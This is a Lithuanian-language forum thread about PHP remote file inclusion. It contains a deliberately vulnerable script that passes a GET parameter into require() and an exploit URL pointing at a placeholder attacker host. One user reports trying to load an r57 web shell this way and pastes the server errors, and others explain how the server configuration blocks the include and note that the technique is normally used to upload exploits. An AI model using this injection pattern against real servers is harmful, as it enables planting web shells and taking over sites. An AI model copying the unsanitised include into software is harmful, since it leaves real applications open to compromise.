O siandien ryte as su Perl parasiau virusa kuris uzkrecia zmones, bet suprantat jis per daug pavojingas kad butu parodytas.
Kokiu mulkiu reik but kad tuo patiket?

Kodas: Pasirinkti visus
<?php
$color = 'blue';
if ( isset( $_GET['SPALVA'] ) )
$color = $_GET['SPALVA'];
require( $color . '.php' );
?>
<form>
<select name="SPALVA">
<option value="red">red</option>
<option value="blue">blue</option>
</select>
<input type="submit">
</form>
Kodas: Pasirinkti visus
/lama.php?SPALVA=http://mano.kieciausias.saitas/phpkodas

Na as bandau paleisti r57 shell'a ir man meta tokias klaidas:GODhack rašė:Tai as tau tai ir parasiau. Pamegink kur nors.
Kurios vietos nesupratai? Ar gal nesigauna? Nes nebandziau pats sitos savo rasliavos neturiu http servo po ranka.
Kodas: Pasirinkti visus
Warning: require() [function.require]: URL file-access is disabled in the server configuration in C:\wamp\www\index.php on line 5
Warning: require(http://127.0.0.1/r57shell.php) [function.require]: failed to open stream: no suitable wrapper could be found in C:\wamp\www\index.php on line 5
Fatal error: require() [function.require]: Failed opening required 'http://127.0.0.1/r57shell.php' (include_path='.;C:\php5\pear') in C:\wamp\www\index.php on line 5
Tiesą sakant tie errorai labai žiaurūs. Greičiausiai įjungtas pačiam serveryje SAFE_MODE ir neleidžia includinti nuotoliniu failu. Jeigu ir leistu tuos failus includinti, tai si r57 shello(ar bet kokio kito PHP shello) nebūtų naudos, nes paprasčiausiai uždraustos visos sisteminės funkcijos, kaip exec, system ir pan.GODhack rašė:Nors paprastai tai naudojama exploito ikelimui, bet teoriskai imanoma ir tai ka tu nori padaryt.
Netrodo labai jau ziaurus tie tavo erorai galima isnagrineti juos ir ju isvangti.
Bent jau zaidybineje situacijoje kai pats sau ir adminas esi. Kaip matau reikalaujama kitokios konfiguracijos.

Vartotojai naršantys šį forumą: 1 ir 0 svečias(ių)